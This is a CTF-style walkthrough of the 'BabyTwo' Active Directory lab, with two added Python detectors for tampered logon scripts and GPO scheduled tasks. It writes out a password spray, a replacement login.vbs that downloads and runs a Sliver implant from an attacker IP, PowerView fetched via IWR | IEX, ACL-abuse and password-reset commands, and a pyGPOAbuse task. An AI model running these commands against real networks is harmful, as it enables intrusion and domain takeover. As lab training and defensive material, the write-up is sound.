Syk0

BabyTwo

Initial machine information

The User flag for this Box is located in a non-standard directory, C:\.

Overview

BabyTwo demonstrates a SYSVOL script replacement attack chained with ACL abuse to escalate through AD to domain admin via GPO execution. Initial credentials come from a username-equals-password spray, and SYSVOL write access allows injecting a malicious login script that provides a foothold. ACL analysis then reveals a path to GPOADM, enabling full domain compromise via pyGPOAbuse.


Recon

Nmap

sudo nmap -sC -sV -vv -oA tcp 10.129.234.72 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.234.72

Standard Windows DC ports: SMB (445), Kerberos (88), LDAP (389/636), DNS (53), RDP (3389). Add dc.baby2.vl and baby2.vl to /etc/hosts.

SMB - Guest Access

nxc smb 10.129.234.72 -u '' -p '' --shares

Guest access is available. The homes share contains a listing of user home directories, exposing a username list - no useful file contents, but valuable for AD enumeration.

User Validation with Kerbrute

Extract usernames from the share listing and validate them against the DC:

kerbrute userenum --dc dc.baby2.vl -d baby2.vl users

Password Spray - User = Password

A common misconfiguration on new accounts is setting the password to match the username. Test this across all confirmed users with --no-bruteforce (one attempt per user) to avoid lockouts:

nxc smb baby2.vl -u users -p users --no-bruteforce --continue-on-success

Hit: Carl.Moore:Carl.Moore

BloodHound Collection

With valid credentials, run a BloodHound collector to map the AD environment:

bloodhound-ce-python -c all -u Carl.Moore -p 'Carl.Moore' -d baby2.vl -dc dc.baby2.vl --dns-tcp -ns 10.129.234.72

SYSVOL - LNK File Analysis

While enumerating SMB shares, a .lnk file (login.vbs.lnk) is found. Use lnkinfo (from the liblnk-utils package) to parse it:

lnkinfo login.vbs.lnk > info

The LNK points to login.vbs on the SYSVOL share - a logon script that runs for domain users. Read it directly (SYSVOL is world-readable):

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")
 
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
 
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
 
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
 
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
 
    Set objNetwork = Nothing
End Sub
 
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

Critically, we have write access to SYSVOL with our credentials - meaning we can replace this script with a malicious one that runs as any domain user who logs in.


Foothold

SYSVOL Script Replacement

Replace login.vbs with a malicious VBScript that downloads and executes a Sliver implant:

Sub MapNetworkShare()
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell (New-Object System.Net.WebClient).DownloadFile('http://10.10.15.150/ag.exe', 'C:\\Windows\\Temp\\ag.exe')"
    objShell.Run "C:\\Windows\\Temp\\ag.exe"
End Sub
 
MapNetworkShare

Host ag.exe (a Sliver HTTP beacon) on a Python HTTP server. Upload the modified script to SYSVOL, overwriting the original. When any domain user logs in, the script executes and calls back to our listener.
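From the defender's side, the weakness above is detectable: logon scripts in SYSVOL change rarely, so a baseline hash plus a content scan catches a swapped script. The following is an added example (not part of the original writeup); the two scripts are constructed inline from the benign and replaced login.vbs shown on this page, with the benign one trimmed to its core.

```python
import hashlib
import re

# Constructed samples: the legitimate drive-mapping login.vbs from SYSVOL
# (trimmed to its core) and the replaced version shown in this writeup.
BENIGN_SCRIPT = r'''Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    Set objNetwork = Nothing
End Sub
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
'''

TAMPERED_SCRIPT = r'''Sub MapNetworkShare()
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell (New-Object System.Net.WebClient).DownloadFile('http://10.10.15.150/ag.exe', 'C:\Windows\Temp\ag.exe')"
    objShell.Run "C:\Windows\Temp\ag.exe"
End Sub
MapNetworkShare
'''

# Content that a drive-mapping logon script has no reason to contain.
SUSPICIOUS = {
    "shell_object": re.compile(r'CreateObject\("WScript\.Shell"\)', re.I),
    "shell_run": re.compile(r'\.Run\s+"', re.I),
    "powershell": re.compile(r'\bpowershell\b', re.I),
    "web_download": re.compile(r'DownloadFile|DownloadString|https?://', re.I),
    "temp_executable": re.compile(r'\\Temp\\[^"\']+\.exe', re.I),
}

def sha256_hex(text):
    """Hash a script's text so the SYSVOL copy can be compared to a known-good baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def audit_logon_script(content, baseline_sha256):
    """Return (changed_from_baseline, [matched indicator names]) for one script."""
    changed = sha256_hex(content) != baseline_sha256
    hits = [name for name, rx in SUSPICIOUS.items() if rx.search(content)]
    return changed, hits

if __name__ == "__main__":
    baseline = sha256_hex(BENIGN_SCRIPT)
    for label, script in (("baseline", BENIGN_SCRIPT), ("current", TAMPERED_SCRIPT)):
        changed, hits = audit_logon_script(script, baseline)
        print(f"login.vbs ({label}): changed={changed} indicators={hits}")
```

In practice the baseline hashes come from a signed copy kept outside SYSVOL, and the scan runs against every file under the NETLOGON and scripts paths, not just login.vbs.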

We receive a Sliver beacon from a domain user session.


Lateral Movement

ACL Abuse - WriteOwner/WriteDACL on GPOADM

BloodHound analysis reveals that Amelia.Griffiths is a member of the [email protected] group, which has WriteOwner and WriteDACL over [email protected].

This means Amelia can take ownership of GPOADM and grant herself full control over the account, allowing a password reset. Transfer PowerView to the machine and abuse the ACL:

IWR http://10.10.15.150/PowerView.ps1 | IEX
 
# Grant Amelia full rights over GPOADM
Add-DomainObjectAcl -TargetIdentity gpoadm -Rights All -PrincipalIdentity Amelia.Griffiths
 
# Reset GPOADM's password
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword GPOADM -AccountPassword $UserPassword

Privilege Escalation

GPO Abuse with pyGPOAbuse

GPOADM has rights to modify Group Policy Objects. Use pyGPOAbuse to add a scheduled task to the Default Domain Policy (GPO ID: 31B2F340-016D-11D2-945F-00C04FB984F9) that executes our implant:

python3 pygpoabuse.py baby2.vl/gpoadm:'Password123!' \
  -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 \
  -command 'C:\\Windows\\Temp\\ag.exe'

The GPO won't apply immediately - we need to force an update. From the Amelia session:

gpupdate

This triggers GPO application on the DC. The scheduled task fires and we receive a new Sliver beacon running as DC$ (the domain controller machine account).

The DC machine account has DCSync rights, giving us full domain compromise.
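The artefact pyGPOAbuse leaves behind is a Group Policy Preferences ScheduledTasks.xml inside the GPO's folder in SYSVOL, carrying an immediate task that runs as SYSTEM. The following is an added example (not part of the original writeup) that parses such a file and flags immediate tasks whose command lives outside trusted directories; the XML is constructed here in the GPP scheduled-task layout as I understand it, with placeholder CLSID and UID values and the command taken from this page.

```python
import xml.etree.ElementTree as ET

# Constructed sample of <GPO>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
# in SYSVOL. CLSID and UID values are placeholders, not real identifiers.
SAMPLE_XML = r'''<ScheduledTasks clsid="{CLSID-PLACEHOLDER}">
  <ImmediateTaskV2 clsid="{CLSID-PLACEHOLDER}" name="TASK_update" uid="{UID-PLACEHOLDER}">
    <Properties action="C" name="TASK_update" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Windows\Temp\ag.exe</Command>
            <Arguments></Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
'''

# Directories from which a legitimately deployed GPO task would normally run.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\")

def find_immediate_tasks(xml_text):
    """Return one dict per ImmediateTask* entry that executes a command."""
    findings = []
    root = ET.fromstring(xml_text)
    for task in root:
        if not task.tag.startswith("ImmediateTask"):
            continue
        props = task.find("Properties")
        cmd = task.find("Properties/Task/Actions/Exec/Command")
        if props is None or cmd is None:
            continue
        command = (cmd.text or "").strip()
        findings.append({
            "name": task.get("name"),
            "run_as": props.get("runAs"),
            "command": command,
            "outside_trusted_dirs": not command.lower().startswith(TRUSTED_DIRS),
        })
    return findings

if __name__ == "__main__":
    for f in find_immediate_tasks(SAMPLE_XML):
        print(f"[{'ALERT' if f['outside_trusted_dirs'] else 'info'}] "
              f"task={f['name']} runAs={f['run_as']} command={f['command']}")
```

Pair this with monitoring of the GPO version attribute and the gPCMachineExtensionNames attribute on the policy object, both of which change when a preferences extension is added.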


Attack Chain Summary

Phase | Technique | Result
--- | --- | ---
Recon | SMB guest + username enumeration | User list from homes share
Credential access | User = Password spray | Carl.Moore:Carl.Moore
Discovery | SYSVOL LNK + script analysis | Write access to login script
Foothold | SYSVOL script replacement → Sliver beacon | Shell as Amelia.Griffiths
Lateral movement | WriteOwner/WriteDACL ACL abuse → PowerView | GPOADM password reset
Privesc | pyGPOAbuse + gpupdate | Beacon as DC$